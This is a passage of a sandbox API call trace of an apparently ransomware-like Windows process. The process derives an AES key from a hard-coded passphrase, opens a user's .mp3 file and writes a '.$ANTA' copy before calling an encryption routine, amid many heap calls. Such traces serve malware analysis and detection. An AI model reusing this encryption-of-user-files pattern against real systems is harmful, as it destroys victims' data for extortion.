hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0111.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0111.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0111.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0111.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0111.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0111.533] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0111.533] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0111.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0111.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0111.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0111.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0111.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0111.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0111.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0111.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0111.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0111.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0111.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0111.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0111.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0111.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0111.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0111.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0111.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0111.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0111.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0111.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0111.534] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0111.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0111.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0111.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0111.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0111.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0111.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0111.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0111.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0111.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0111.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0111.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0111.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0111.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0111.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0111.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0111.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0111.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0111.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0111.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0111.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0111.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0111.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0111.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0111.535] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0111.535] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0111.535] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0111.535] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0111.535] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0111.536] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0111.536] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.536] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0111.536] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0111.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca850, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0111.536] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0111.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0111.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0111.536] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0111.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0111.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0111.536] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.536] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0111.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca820, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0111.536] CryptHashData (hHash=0x41abfc0, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0111.536] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.537] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0111.537] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0111.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caa18, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0111.537] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41abfc0, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac000) returned 1 [0111.537] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0111.537] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0111.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0111.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797048, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0111.537] CryptDestroyHash (hHash=0x41abfc0) returned 1 [0111.537] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\7eNkYBcGM pJGAedeLc.mp3" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\7enkybcgm pjgaedelc.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0111.537] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.537] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0111.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0111.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0111.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0111.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0111.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0111.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0111.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0111.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0111.538] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0111.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0111.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0111.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0111.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0111.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0111.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0111.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0111.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0111.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0111.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0111.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0111.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0111.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0111.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0111.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0111.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0111.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0111.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0111.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0111.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0111.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0111.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0111.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5030 [0111.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369e20 [0111.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a088 [0111.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0111.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a2f0 [0111.539] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u")) returned 0x10 [0111.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0111.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0111.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0111.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0111.539] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\7eNkYBcGM pJGAedeLc.mp3.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\7enkybcgm pjgaedelc.mp3.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0111.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0111.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0111.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0111.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0111.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0111.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0111.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0111.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0111.540] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0111.540] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0111.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0111.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0111.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0111.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0111.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0111.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0111.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0111.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0111.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0111.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0111.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0a020 [0111.543] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0111.543] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x1eef, lpOverlapped=0x0) returned 1 [0111.544] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0111.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0111.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0111.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0111.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0111.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1eef) returned 0x43faa98 [0111.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0a020 | out: hHeap=0x1780000) returned 1 [0111.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0111.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0111.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0111.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0111.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0111.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1eef) returned 0x4516010 [0111.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43faa98 | out: hHeap=0x1780000) returned 1 [0111.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0111.548] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0111.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0111.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0111.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0111.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0111.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1eef) returned 0x43faa98 [0111.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0111.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43faa98 | out: hHeap=0x1780000) returned 1 [0111.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0111.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0111.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0111.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0111.548] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0111.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0111.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0111.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0111.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0111.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0111.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0111.549] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0111.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0111.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0111.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0111.549] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0111.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0111.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0111.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0111.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25b0 [0111.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0111.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0111.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0111.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0111.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1eef) returned 0x43faa98 [0111.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0111.549] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0111.549] RtlAllocateHeap 